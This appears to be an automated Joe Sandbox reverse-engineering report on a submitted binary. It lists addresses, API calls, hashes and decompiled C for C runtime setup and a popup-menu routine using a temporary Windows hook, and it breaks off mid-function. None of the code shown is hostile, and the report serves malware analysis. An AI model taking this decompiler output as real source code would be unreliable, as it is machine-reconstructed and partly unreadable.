                                                                                                                                                                                                                                                                                          0x00107787
                                                                                                                                                                                                                                                                                          0x0010778d
                                                                                                                                                                                                                                                                                          0x00107795
                                                                                                                                                                                                                                                                                          0x0010779a
                                                                                                                                                                                                                                                                                          0x001077a2
                                                                                                                                                                                                                                                                                          0x001077a7
                                                                                                                                                                                                                                                                                          0x001077af
                                                                                                                                                                                                                                                                                          0x001077b6
                                                                                                                                                                                                                                                                                          0x001077bb
                                                                                                                                                                                                                                                                                          0x001077c0
                                                                                                                                                                                                                                                                                          0x001077c2
                                                                                                                                                                                                                                                                                          0x00107827
                                                                                                                                                                                                                                                                                          0x00107827
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001077c4
                                                                                                                                                                                                                                                                                          0x001077c4
                                                                                                                                                                                                                                                                                          0x001077d7
                                                                                                                                                                                                                                                                                          0x001077d9
                                                                                                                                                                                                                                                                                          0x001077de
                                                                                                                                                                                                                                                                                          0x001077e1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001077e3
                                                                                                                                                                                                                                                                                          0x001077ef
                                                                                                                                                                                                                                                                                          0x001077f3
                                                                                                                                                                                                                                                                                          0x001077f5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001077f7
                                                                                                                                                                                                                                                                                          0x00107808
                                                                                                                                                                                                                                                                                          0x0010780a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010780c
                                                                                                                                                                                                                                                                                          0x0010780c
                                                                                                                                                                                                                                                                                          0x0010780e
                                                                                                                                                                                                                                                                                          0x0010780f
                                                                                                                                                                                                                                                                                          0x00107816
                                                                                                                                                                                                                                                                                          0x0010781c
                                                                                                                                                                                                                                                                                          0x00107820
                                                                                                                                                                                                                                                                                          0x00107824
                                                                                                                                                                                                                                                                                          0x00107824
                                                                                                                                                                                                                                                                                          0x0010780a
                                                                                                                                                                                                                                                                                          0x001077f5
                                                                                                                                                                                                                                                                                          0x001077e1
                                                                                                                                                                                                                                                                                          0x001077c2
                                                                                                                                                                                                                                                                                          0x00107776
                                                                                                                                                                                                                                                                                          0x00107830
                                                                                                                                                                                                                                                                                          0x001076ca
                                                                                                                                                                                                                                                                                          0x001076ca
                                                                                                                                                                                                                                                                                          0x001076d2
                                                                                                                                                                                                                                                                                          0x001076d2

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0010672F), ref: 001076BE
                                                                                                                                                                                                                                                                                          • __mtterm.LIBCMT ref: 001076CA
                                                                                                                                                                                                                                                                                            • Part of subcall function 00107403: DecodePointer.KERNEL32(00000006,0010782C,?,0010672F), ref: 00107414
                                                                                                                                                                                                                                                                                            • Part of subcall function 00107403: TlsFree.KERNEL32(00000020,0010782C,?,0010672F), ref: 0010742E
                                                                                                                                                                                                                                                                                            • Part of subcall function 00107403: DeleteCriticalSection.KERNEL32(00000000,00000000,778DF3A0,?,0010782C,?,0010672F), ref: 0010A56B
                                                                                                                                                                                                                                                                                            • Part of subcall function 00107403: DeleteCriticalSection.KERNEL32(00000020,778DF3A0,?,0010782C,?,0010672F), ref: 0010A595
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 001076E0
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 001076ED
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 001076FA
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00107707
                                                                                                                                                                                                                                                                                          • TlsAlloc.KERNEL32(?,0010672F), ref: 00107757
                                                                                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(00000000,?,0010672F), ref: 00107772
                                                                                                                                                                                                                                                                                          • __init_pointers.LIBCMT ref: 0010777C
                                                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(?,0010672F), ref: 0010778D
                                                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(?,0010672F), ref: 0010779A
                                                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(?,0010672F), ref: 001077A7
                                                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(?,0010672F), ref: 001077B4
                                                                                                                                                                                                                                                                                          • DecodePointer.KERNEL32(00107587,?,0010672F), ref: 001077D5
                                                                                                                                                                                                                                                                                          • __calloc_crt.LIBCMT ref: 001077EA
                                                                                                                                                                                                                                                                                          • DecodePointer.KERNEL32(00000000,?,0010672F), ref: 00107804
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00107816
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                                                                                                                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                                                                          • API String ID: 1868149495-3819984048
                                                                                                                                                                                                                                                                                          • Opcode ID: 1b185659de15a5a8367bc76d3a6fe0fdf82b62482bf222932852c91fb011267d
                                                                                                                                                                                                                                                                                          • Instruction ID: 91b7ac80fe046339eb0ad67ec580de5cdf9ee92de43bcffc94e525927598d533
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b185659de15a5a8367bc76d3a6fe0fdf82b62482bf222932852c91fb011267d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B313B71D84312DBC727AF75AD099593EB5EB4C361B10452AE4A8D2AF0DBF4A4C2CED0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                          			E000FF7B0(struct tagTPMPARAMS* __ecx, int __edx, intOrPtr _a4, struct HMENU__* _a8, int _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v172;
                                                                                                                                                                                                                                                                                          				struct tagTPMPARAMS* _v176;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _v180;
                                                                                                                                                                                                                                                                                          				intOrPtr _v184;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v188;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v236;
                                                                                                                                                                                                                                                                                          				char _v240;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _v244;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t68;
                                                                                                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                                                                                                          				int _t79;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t83;
                                                                                                                                                                                                                                                                                          				signed int _t85;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t94;
                                                                                                                                                                                                                                                                                          				intOrPtr _t104;
                                                                                                                                                                                                                                                                                          				intOrPtr _t106;
                                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t108;
                                                                                                                                                                                                                                                                                          				struct HHOOK__* _t112;
                                                                                                                                                                                                                                                                                          				intOrPtr _t113;
                                                                                                                                                                                                                                                                                          				int _t135;
                                                                                                                                                                                                                                                                                          				void* _t137;
                                                                                                                                                                                                                                                                                          				int _t138;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t143;
                                                                                                                                                                                                                                                                                          				void* _t144;
                                                                                                                                                                                                                                                                                          				CHAR** _t145;
                                                                                                                                                                                                                                                                                          				signed int _t146;
                                                                                                                                                                                                                                                                                          				void* _t147;
                                                                                                                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F7D0);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t148 = _t147 - 0xe4;
                                                                                                                                                                                                                                                                                          				_t68 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t69 = _t68 ^ _t146;
                                                                                                                                                                                                                                                                                          				_v20 = _t69;
                                                                                                                                                                                                                                                                                          				_push(_t69);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t135 = __edx;
                                                                                                                                                                                                                                                                                          				_t106 = _a4;
                                                                                                                                                                                                                                                                                          				_v184 = _t106;
                                                                                                                                                                                                                                                                                          				_v180 = _a8;
                                                                                                                                                                                                                                                                                          				_v176 = __ecx;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v244 = 0x170c68;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          				if(_t106 == 0) {
                                                                                                                                                                                                                                                                                          					 *0x17199c = 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					 *0x17199c = _t106 + 4;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *0x171998 = SetWindowsHookExA(5, E00100A20,  *0x170c08, GetCurrentThreadId());
                                                                                                                                                                                                                                                                                          				 *(_t106 + 0x84) =  *(_t106 + 0x84) & 0x000000f7 | 0x00000001;
                                                                                                                                                                                                                                                                                          				_v188 =  *(_t106 + 4);
                                                                                                                                                                                                                                                                                          				_t79 = TrackPopupMenuEx(_v180, _a12, E00101BD0(_t135, _a16), _t135, _v188, _v176);
                                                                                                                                                                                                                                                                                          				_t112 =  *0x171998; // 0x0
                                                                                                                                                                                                                                                                                          				 *(_t106 + 0x84) =  *(_t106 + 0x84) & 0x000000fe;
                                                                                                                                                                                                                                                                                          				_v176 = _t79;
                                                                                                                                                                                                                                                                                          				UnhookWindowsHookEx(_t112);
                                                                                                                                                                                                                                                                                          				 *0x171998 = 0;
                                                                                                                                                                                                                                                                                          				 *0x17199c = 0;
                                                                                                                                                                                                                                                                                          				LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          				_t127 =  *(_t106 + 4);
                                                                                                                                                                                                                                                                                          				_v240 = 0;
                                                                                                                                                                                                                                                                                          				UpdateWindow( *(_t106 + 4));
                                                                                                                                                                                                                                                                                          				_t143 =  *(_t106 + 4);
                                                                                                                                                                                                                                                                                          				_t83 = GetParent(_t143);
                                                                                                                                                                                                                                                                                          				if(_t83 == 0) {
                                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                                          					UpdateWindow(_t143);
                                                                                                                                                                                                                                                                                          					if(( *(_t106 + 0x84) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                                          							_t113 =  *((intOrPtr*)(_t106 + 0x18));
                                                                                                                                                                                                                                                                                          							_t85 = _t113 - 1;
                                                                                                                                                                                                                                                                                          							if(_t85 < 0) {
                                                                                                                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t127 =  *(_t106 + 0x14);
                                                                                                                                                                                                                                                                                          							_t108 =  *( *(_t106 + 0x14) + _t85 * 4);
                                                                                                                                                                                                                                                                                          							if(_t85 >= _t113) {
                                                                                                                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							 *(_v184 + 0x18) = _t85;
                                                                                                                                                                                                                                                                                          							if(_t108 == 0) {
                                                                                                                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t138 = 0;
                                                                                                                                                                                                                                                                                          							if(GetMenuItemCount(_t108) <= 0) {
                                                                                                                                                                                                                                                                                          								L8:
                                                                                                                                                                                                                                                                                          								_t106 = _v184;
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								goto L13;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								L13:
                                                                                                                                                                                                                                                                                          								E00106820( &_v236, 0, 0x30);
                                                                                                                                                                                                                                                                                          								_v236.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          								E00106820( &(_v172.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          								_t148 = _t148 + 0x18;
                                                                                                                                                                                                                                                                                          								_v172.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          								if(GetVersionExA( &_v172) == 0) {
                                                                                                                                                                                                                                                                                          									L17:
                                                                                                                                                                                                                                                                                          									_v236.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          									L18:
                                                                                                                                                                                                                                                                                          									_t127 =  &_v236;
                                                                                                                                                                                                                                                                                          									_v236.fMask = 0x32;
                                                                                                                                                                                                                                                                                          									GetMenuItemInfoA(_t108, _t138, 1,  &_v236);
                                                                                                                                                                                                                                                                                          									_t94 = _v236.dwItemData;
                                                                                                                                                                                                                                                                                          									_v180 = _t94;
                                                                                                                                                                                                                                                                                          									if(_t94 != 0 &&  *_t94 == 0x1313) {
                                                                                                                                                                                                                                                                                          										_v236.fMask = 0x31;
                                                                                                                                                                                                                                                                                          										_v236.fType =  *((intOrPtr*)(_t94 + 8));
                                                                                                                                                                                                                                                                                          										_t145 = _t94 + 4;
                                                                                                                                                                                                                                                                                          										_v236.fState =  *((intOrPtr*)(_t94 + 0xc));
                                                                                                                                                                                                                                                                                          										_v236.dwTypeData =  *_t145;
                                                                                                                                                                                                                                                                                          										_v236.cch = lstrlenA( *_t145);
                                                                                                                                                                                                                                                                                          										_v236.dwItemData = 0;
                                                                                                                                                                                                                                                                                          										SetMenuItemInfoA(_t108, _t138, 1,  &_v236);
                                                                                                                                                                                                                                                                                          										_t127 = _v236.fState | _v236.fType | 0x00000400;
                                                                                                                                                                                                                                                                                          										ModifyMenuA(_t108, _t138, _v236.fState | _v236.fType | 0x00000400, _v236.wID,  *_t145);
                                                                                                                                                                                                                                                                                          										_push( *_t145);
                                                                                                                                                                                                                                                                                          										E001062C2();
                                                                                                                                                                                                                                                                                          										_push(_v180);
                                                                                                                                                                                                                                                                                          										E001059DB();
                                                                                                                                                                                                                                                                                          										_t148 = _t148 + 8;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t104 = _v172.dwMajorVersion;
                                                                                                                                                                                                                                                                                          								if(_t104 >= 5 || _t104 == 4 && _v172.dwMinorVersion >= 0x5a) {
                                                                                                                                                                                                                                                                                          									goto L18;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									goto L17;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L21:
                                                                                                                                                                                                                                                                                          								_t138 = _t138 + 1;
                                                                                                                                                                                                                                                                                          							} while (_t138 < GetMenuItemCount(_t108));
                                                                                                                                                                                                                                                                                          							goto L8;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					_pop(_t137);
                                                                                                                                                                                                                                                                                          					_pop(_t144);
                                                                                                                                                                                                                                                                                          					_pop(_t107);
                                                                                                                                                                                                                                                                                          					return E001059E6(_v176, _t107, _v20 ^ _t146, _t127, _t137, _t144);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						_t143 = _t83;
                                                                                                                                                                                                                                                                                          						_t83 = GetParent(_t83);
                                                                                                                                                                                                                                                                                          					} while (_t83 != 0);
                                                                                                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}






































                                                                                                                                                                                                                                                                                          0x000ff7b3
                                                                                                                                                                                                                                                                                          0x000ff7b5
                                                                                                                                                                                                                                                                                          0x000ff7c0
                                                                                                                                                                                                                                                                                          0x000ff7c1
                                                                                                                                                                                                                                                                                          0x000ff7c7
                                                                                                                                                                                                                                                                                          0x000ff7cc
                                                                                                                                                                                                                                                                                          0x000ff7ce
                                                                                                                                                                                                                                                                                          0x000ff7d4
                                                                                                                                                                                                                                                                                          0x000ff7d8
                                                                                                                                                                                                                                                                                          0x000ff7de
                                                                                                                                                                                                                                                                                          0x000ff7e0
                                                                                                                                                                                                                                                                                          0x000ff7e6
                                                                                                                                                                                                                                                                                          0x000ff7ec
                                                                                                                                                                                                                                                                                          0x000ff7f2
                                                                                                                                                                                                                                                                                          0x000ff7fa
                                                                                                                                                                                                                                                                                          0x000ff7fd
                                                                                                                                                                                                                                                                                          0x000ff80c
                                                                                                                                                                                                                                                                                          0x000ff810
                                                                                                                                                                                                                                                                                          0x000ff818
                                                                                                                                                                                                                                                                                          0x000ff825
                                                                                                                                                                                                                                                                                          0x000ff81a
                                                                                                                                                                                                                                                                                          0x000ff81d
                                                                                                                                                                                                                                                                                          0x000ff81d
                                                                                                                                                                                                                                                                                          0x000ff84c
                                                                                                                                                                                                                                                                                          0x000ff85b
                                                                                                                                                                                                                                                                                          0x000ff861
                                                                                                                                                                                                                                                                                          0x000ff887
                                                                                                                                                                                                                                                                                          0x000ff88d
                                                                                                                                                                                                                                                                                          0x000ff893
                                                                                                                                                                                                                                                                                          0x000ff89b
                                                                                                                                                                                                                                                                                          0x000ff8a1
                                                                                                                                                                                                                                                                                          0x000ff8ae
                                                                                                                                                                                                                                                                                          0x000ff8b3
                                                                                                                                                                                                                                                                                          0x000ff8b8
                                                                                                                                                                                                                                                                                          0x000ff8be
                                                                                                                                                                                                                                                                                          0x000ff8c2
                                                                                                                                                                                                                                                                                          0x000ff8c9
                                                                                                                                                                                                                                                                                          0x000ff8cf
                                                                                                                                                                                                                                                                                          0x000ff8d9
                                                                                                                                                                                                                                                                                          0x000ff8dd
                                                                                                                                                                                                                                                                                          0x000ff8e9
                                                                                                                                                                                                                                                                                          0x000ff8ea
                                                                                                                                                                                                                                                                                          0x000ff8f7
                                                                                                                                                                                                                                                                                          0x000ff926
                                                                                                                                                                                                                                                                                          0x000ff926
                                                                                                                                                                                                                                                                                          0x000ff929
                                                                                                                                                                                                                                                                                          0x000ff92e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff930
                                                                                                                                                                                                                                                                                          0x000ff933
                                                                                                                                                                                                                                                                                          0x000ff938
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff940
                                                                                                                                                                                                                                                                                          0x000ff945
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff948
                                                                                                                                                                                                                                                                                          0x000ff952
                                                                                                                                                                                                                                                                                          0x000ff920
                                                                                                                                                                                                                                                                                          0x000ff920
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff954
                                                                                                                                                                                                                                                                                          0x000ff954
                                                                                                                                                                                                                                                                                          0x000ff95f
                                                                                                                                                                                                                                                                                          0x000ff975
                                                                                                                                                                                                                                                                                          0x000ff97f
                                                                                                                                                                                                                                                                                          0x000ff984
                                                                                                                                                                                                                                                                                          0x000ff98e
                                                                                                                                                                                                                                                                                          0x000ff9a0
                                                                                                                                                                                                                                                                                          0x000ff9bb
                                                                                                                                                                                                                                                                                          0x000ff9bb
                                                                                                                                                                                                                                                                                          0x000ff9c5
                                                                                                                                                                                                                                                                                          0x000ff9c5
                                                                                                                                                                                                                                                                                          0x000ff9d0
                                                                                                                                                                                                                                                                                          0x000ff9da
                                                                                                                                                                                                                                                                                          0x000ff9e0
                                                                                                                                                                                                                                                                                          0x000ff9e6
                                                                                                                                                                                                                                                                                          0x000ff9ee
                                                                                                                                                                                                                                                                                          0x000ffa00
                                                                                                                                                                                                                                                                                          0x000ffa0d
                                                                                                                                                                                                                                                                                          0x000ffa16
                                                                                                                                                                                                                                                                                          0x000ffa19
                                                                                                                                                                                                                                                                                          0x000ffa21
                                                                                                                                                                                                                                                                                          0x000ffa3b
                                                                                                                                                                                                                                                                                          0x000ffa41
                                                                                                                                                                                                                                                                                          0x000ffa4b
                                                                                                                                                                                                                                                                                          0x000ffa67
                                                                                                                                                                                                                                                                                          0x000ffa70
                                                                                                                                                                                                                                                                                          0x000ffa78
                                                                                                                                                                                                                                                                                          0x000ffa79
                                                                                                                                                                                                                                                                                          0x000ffa87
                                                                                                                                                                                                                                                                                          0x000ffa88
                                                                                                                                                                                                                                                                                          0x000ffa8d
                                                                                                                                                                                                                                                                                          0x000ffa8d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff9ee
                                                                                                                                                                                                                                                                                          0x000ff9a2
                                                                                                                                                                                                                                                                                          0x000ff9ab
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ffa90
                                                                                                                                                                                                                                                                                          0x000ffa91
                                                                                                                                                                                                                                                                                          0x000ffa98
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ffaa0
                                                                                                                                                                                                                                                                                          0x000ff926
                                                                                                                                                                                                                                                                                          0x000ff8f9
                                                                                                                                                                                                                                                                                          0x000ff902
                                                                                                                                                                                                                                                                                          0x000ff90a
                                                                                                                                                                                                                                                                                          0x000ff90b
                                                                                                                                                                                                                                                                                          0x000ff90c
                                                                                                                                                                                                                                                                                          0x000ff91a
                                                                                                                                                                                                                                                                                          0x000ff8e0
                                                                                                                                                                                                                                                                                          0x000ff8e0
                                                                                                                                                                                                                                                                                          0x000ff8e1
                                                                                                                                                                                                                                                                                          0x000ff8e3
                                                                                                                                                                                                                                                                                          0x000ff8e5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000ff8e0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68,1F9A9BDF), ref: 000FF810
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000FF831
                                                                                                                                                                                                                                                                                          • SetWindowsHookExA.USER32 ref: 000FF840
                                                                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,?,00000000,?,?,?), ref: 000FF887
                                                                                                                                                                                                                                                                                          • UnhookWindowsHookEx.USER32(00000000), ref: 000FF8A1
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68), ref: 000FF8B8
                                                                                                                                                                                                                                                                                          • UpdateWindow.USER32(00000001), ref: 000FF8C9
                                                                                                                                                                                                                                                                                          • GetParent.USER32(00000001), ref: 000FF8D9
                                                                                                                                                                                                                                                                                          • GetParent.USER32(00000000), ref: 000FF8E3
                                                                                                                                                                                                                                                                                          • UpdateWindow.USER32(00000001), ref: 000FF8EA
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalHookParentSectionUpdateWindowWindows$CurrentEnterLeaveMenuPopupThreadTrackUnhook
                                                                                                                                                                                                                                                                                          • String ID: ,$1$Z
                                                                                                                                                                                                                                                                                          • API String ID: 792872514-2998721434
                                                                                                                                                                                                                                                                                          • Opcode ID: cb1062771995f63129b825699c9d748445dfc74208f5852e2aef1be6d893fe5c
                                                                                                                                                                                                                                                                                          • Instruction ID: b7c5e9532569a9ecf2c65738c75d9778c37c9ee08d9c7e84949ef05e4e1ea57a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb1062771995f63129b825699c9d748445dfc74208f5852e2aef1be6d893fe5c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA818F70A00359EFDB21CF54DD84BAAB7B9FF48700F0081A9EA49A7641DBB099C5CF61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                                          			E00102230(void* __ecx, int _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v28;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v44;
                                                                                                                                                                                                                                                                                          				long _v48;
                                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v64;
                                                                                                                                                                                                                                                                                          				int _v68;
                                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                                                                                          				signed int _v80;
                                                                                                                                                                                                                                                                                          				signed int _v84;
                                                                                                                                                                                                                                                                                          				signed int _v88;
                                                                                                                                                                                                                                                                                          				int _v92;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v140;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t121;
                                                                                                                                                                                                                                                                                          				signed int _t124;
                                                                                                                                                                                                                                                                                          				long _t132;
                                                                                                                                                                                                                                                                                          				signed int _t141;
                                                                                                                                                                                                                                                                                          				signed int _t143;
                                                                                                                                                                                                                                                                                          				signed int _t148;
                                                                                                                                                                                                                                                                                          				intOrPtr _t151;
                                                                                                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                                                                                                          				int _t167;
                                                                                                                                                                                                                                                                                          				int _t168;
                                                                                                                                                                                                                                                                                          				struct HBRUSH__* _t169;
                                                                                                                                                                                                                                                                                          				RECT* _t192;
                                                                                                                                                                                                                                                                                          				long _t194;
                                                                                                                                                                                                                                                                                          				long _t200;
                                                                                                                                                                                                                                                                                          				signed int _t203;
